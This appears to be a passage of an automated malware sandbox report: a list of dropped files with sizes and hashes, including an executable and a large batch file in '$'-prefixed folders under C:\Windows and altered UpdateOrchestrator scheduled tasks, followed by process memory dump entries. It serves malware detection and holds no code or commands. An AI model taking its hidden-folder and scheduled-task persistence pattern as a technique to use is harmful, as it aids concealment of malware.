C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
1fd4589b43491635908a6caeb1b3f238

SHA1
6636a4ce828a8a05d6f8907e225acd6b86efcca2

SHA256
a46ece184be91b2df6d4ed881d60e7fe97f8815d22aa94b04dfd941dbd14167e

SHA512
55513f074b593b5cf0bc4ed8839592112bce7f19a16778d86e6279f3c64347a56e43fd0a3dab0264bde2f153522a8174eb7381270a85580925a3de7f9d7ddb70

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
22bf210452633bc47126e770cdffee45

SHA1
5eb84a401a64cef67387ce3ec1477ba0ac308b33

SHA256
cb3939ac1fabece3d3d24245cd69baf3a98bdf6ebc5efa78a78d8569b91affaf

SHA512
e13c6bbc6d398e84850e515494169cf78c5e2b6cccc6d4bc6e9b19d5792b96782b88e03f24b1c2fa34ce0153723998ce4efcdb524f1492eb0b3f0f638b671d26

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
33cf6a4c4b3fc09ceb96653e5fe3c561

SHA1
aed484672c53f89ed7b991c1e973ab833b2eefec

SHA256
db2e36048da4fe2bd9532efcb73ae84eec938a1b679f4dbd3e9e9b6b7e7c7243

SHA512
db5da5453b57dce077c92f13fce2ac72aa240da10852cd46bf59f959ccd44928647af849969d61815c01480432db46d41d15283d75dac30735ba2552521e4ea4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
78e97326031132b73494010cd087ee81

SHA1
03d6e56ec4a1199cfbdaef4ce359121284f5bfee

SHA256
42d4af0b22b8e1b953535101b7548981d3b0d4e0c01abdc7ea71830193ff8299

SHA512
324002ea7474cfd9cea72906e2ad8234cb27acd8e109996d8ccf748edb7150d1f254012354c4e7a29212930c3c0288082fed905b4ad0b9f16f2886887f3b6620

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bd2echhn.hjc.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 608677.crdownload

Filesize
327KB

MD5
90fcc766288dc30d3e12810feac5a373

SHA1
6750249adf29f74cce5c10db107766f91a2ef92d

SHA256
fcc48a9c9f3227be8b8231cb103b14f8a030e9f7ff580ac6f91750eb185fced7

SHA512
612103390fa99f7cae19858d943df98e87accd5eed388c401b9735e89ab0132e9304d4137ae93355eebe19e1041765334364afe9d1dc9986c45f1d89e28a680c

Download Submit
C:\Windows\$nya-onimai2\iHGIHk.exe

Filesize
36KB

MD5
b943a57bdf1bbd9c33ab0d33ff885983

SHA1
1cee65eea1ab27eae9108c081e18a50678bd5cdc

SHA256
878df6f755578e2e79d0e6fd350f5b4430e0e42bb4bc8757afb97999bc405ba4

SHA512
cb7253de88bd351f8bcb5dc0b5760d3d2875d39f601396a4250e06ead9e7edeffcd94fa23f392833f450c983a246952f2bad3a40f84aff2adc0f7d0eb408d03c

Download Submit
C:\Windows\$rbx-onimai2\$rbx-CO2.bat

Filesize
7.3MB

MD5
d96987d5645d0a45dc0830e166db747e

SHA1
ffe0eb0aaca891bba84dd508accdbbc2df6d59f9

SHA256
c07250a2ea7a8523defaa97352e48b28106c21a111c81285a9ab0a34843bdc0d

SHA512
43d8c564977621e9368023aa3b7405b52e3d5a0d9e4c4cd4e9755be5023f59d23408cf7d50c388865d4d9215789917d5d099e66614fbb08fab38f65b94c6fa4b

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

Filesize
2KB

MD5
8abf2d6067c6f3191a015f84aa9b6efe

SHA1
98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7

SHA256
ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea

SHA512
c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

Filesize
2KB

MD5
f313c5b4f95605026428425586317353

SHA1
06be66fa06e1cffc54459c38d3d258f46669d01a

SHA256
129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b

SHA512
b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

Filesize
2KB

MD5
ceb7caa4e9c4b8d760dbf7e9e5ca44c5

SHA1
a3879621f9493414d497ea6d70fbf17e283d5c08

SHA256
98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9

SHA512
1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

Filesize
2KB

MD5
7d612892b20e70250dbd00d0cdd4f09b

SHA1
63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5

SHA256
727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02

SHA512
f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

Filesize
2KB

MD5
1e8e2076314d54dd72e7ee09ff8a52ab

SHA1
5fd0a67671430f66237f483eef39ff599b892272

SHA256
55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f

SHA512
5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

Filesize
2KB

MD5
0b990e24f1e839462c0ac35fef1d119e

SHA1
9e17905f8f68f9ce0a2024d57b537aa8b39c6708

SHA256
a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a

SHA512
c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

Download Submit
memory/332-101-0x000001772BAB0000-0x000001772BADA000-memory.dmp

Filesize
168KB

Download
memory/616-55-0x000001C3A13C0000-0x000001C3A13EA000-memory.dmp

Filesize
168KB

Download
memory/616-54-0x000001C3A1390000-0x000001C3A13B4000-memory.dmp

Filesize
144KB

Download
memory/616-67-0x000001C3A13C0000-0x000001C3A13EA000-memory.dmp

Filesize
168KB

Download
memory/616-56-0x000001C3A13C0000-0x000001C3A13EA000-memory.dmp

Filesize
168KB

Download
memory/616-65-0x000001C3A13C0000-0x000001C3A13EA000-memory.dmp

Filesize
168KB

Download
memory/616-64-0x000001C3A13C0000-0x000001C3A13EA000-memory.dmp

Filesize
168KB

Download
memory/616-61-0x000001C3A13C0000-0x000001C3A13EA000-memory.dmp

Filesize
168KB

Download
memory/616-62-0x000001C3A13C0000-0x000001C3A13EA000-memory.dmp

Filesize
168KB

Download
memory/616-63-0x000001C3A13C0000-0x000001C3A13EA000-memory.dmp

Filesize
168KB

Download
memory/616-66-0x00007FFB871D0000-0x00007FFB871E0000-memory.dmp

Filesize
64KB

Download
memory/664-81-0x00007FFB871D0000-0x00007FFB871E0000-memory.dmp

Filesize
64KB

Download
memory/664-80-0x000001FA36990000-0x000001FA369BA000-memory.dmp

Filesize
168KB

Download
memory/664-71-0x000001FA36990000-0x000001FA369BA000-memory.dmp

Filesize
168KB

Download
memory/664-79-0x000001FA36990000-0x000001FA369BA000-memory.dmp

Filesize
168KB

Download
memory/664-82-0x000001FA36990000-0x000001FA369BA000-memory.dmp

Filesize
168KB

Download
memory/664-76-0x000001FA36990000-0x000001FA369BA000-memory.dmp

Filesize
168KB

Download
memory/664-77-0x000001FA36990000-0x000001FA369BA000-memory.dmp

Filesize
168KB

Download
memory/664-78-0x000001FA36990000-0x000001FA369BA000-memory.dmp

Filesize
168KB

Download
memory/956-94-0x0000029BF19D0000-0x0000029BF19FA000-memory.dmp

Filesize
168KB

Download
memory/956-92-0x0000029BF19D0000-0x0000029BF19FA000-memory.dmp

Filesize
168KB

Download
memory/956-97-0x0000029BF19D0000-0x0000029BF19FA000-memory.dmp

Filesize
168KB

Download
memory/956-86-0x0000029BF19D0000-0x0000029BF19FA000-memory.dmp

Filesize
168KB

Download
memory/956-91-0x0000029BF19D0000-0x0000029BF19FA000-memory.dmp

Filesize
168KB

Download
memory/956-96-0x00007FFB871D0000-0x00007FFB871E0000-memory.dmp

Filesize
64KB

Download
memory/956-95-0x0000029BF19D0000-0x0000029BF19FA000-memory.dmp

Filesize
168KB

Download
memory/956-93-0x0000029BF19D0000-0x0000029BF19FA000-memory.dmp

Filesize
168KB

Download
memory/2808-46-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2808-48-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2808-44-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2808-50-0x00007FFBC6A20000-0x00007FFBC6ADE000-memory.dmp

Filesize
760KB

Download
memory/2808-43-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2808-49-0x00007FFBC7150000-0x00007FFBC7345000-memory.dmp

Filesize
2.0MB

Download
memory/2808-45-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2808-51-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/3752-3528-0x000002148B4E0000-0x000002148B536000-memory.dmp

Filesize
344KB

Download
memory/4576-1186-0x00007FFBA8E00000-0x00007FFBA98C1000-memory.dmp

Filesize
10.8MB

Download
memory/4576-1225-0x00007FFBA8E00000-0x00007FFBA98C1000-memory.dmp

Filesize
10.8MB

Download
memory/4576-791-0x000001607C3D0000-0x000001607C742000-memory.dmp

Filesize
3.4MB

Download
memory/4576-11-0x00007FFBA8E00000-0x00007FFBA98C1000-memory.dmp

Filesize
10.8MB

Download
memory/4576-0-0x00007FFBA8E03000-0x00007FFBA8E05000-memory.dmp

Filesize
8KB

Download
memory/4576-12-0x0000016063540000-0x0000016063584000-memory.dmp

Filesize
272KB

Download
memory/4576-40-0x000001607BD80000-0x000001607C1C6000-memory.dmp

Filesize
4.3MB

Download
memory/4576-13-0x00007FFBA8E00000-0x00007FFBA98C1000-memory.dmp

Filesize
10.8MB

Download
memory/4576-1-0x0000016063140000-0x0000016063162000-memory.dmp

Filesize
136KB

Download
memory/4576-14-0x0000016063610000-0x0000016063686000-memory.dmp

Filesize
472KB

Download
memory/4576-27-0x0000016048CD0000-0x0000016048D0A000-memory.dmp

Filesize
232KB

Download
memory/4576-42-0x00007FFBC6A20000-0x00007FFBC6ADE000-memory.dmp

Filesize
760KB

Download
memory/4576-41-0x00007FFBC7150000-0x00007FFBC7345000-memory.dmp

Filesize
2.0MB

Download
memory/4576-1185-0x00007FFBA8E03000-0x00007FFBA8E05000-memory.dmp

Filesize
8KB

Download
memory/5036-2306-0x000001CDFF3B0000-0x000001CDFF572000-memory.dmp

Filesize
1.8MB

Download
memory/5036-2307-0x000001CDB0530000-0x000001CDB0A58000-memory.dmp

Filesize
5.2MB

Download
memory/5036-2305-0x000001CDFF120000-0x000001CDFF1D2000-memory.dmp

Filesize
712KB

Download
memory/5036-2304-0x000001CDFEE50000-0x000001CDFEEA0000-memory.dmp

Filesize
320KB

Download
memory/5036-1963-0x000001CDFE0D0000-0x000001CDFE83E000-memory.dmp

Filesize
7.4MB

Download
memory/5684-2666-0x0000022E2AB00000-0x0000022E2AB0E000-memory.dmp

Filesize
56KB

Download
memory/5900-3421-0x00000146E1AE0000-0x00000146E1B36000-memory.dmp

Filesize
344KB

Download
memory/6000-3374-0x000002800D750000-0x000002800D7A6000-memory.dmp

Filesize
344KB

Download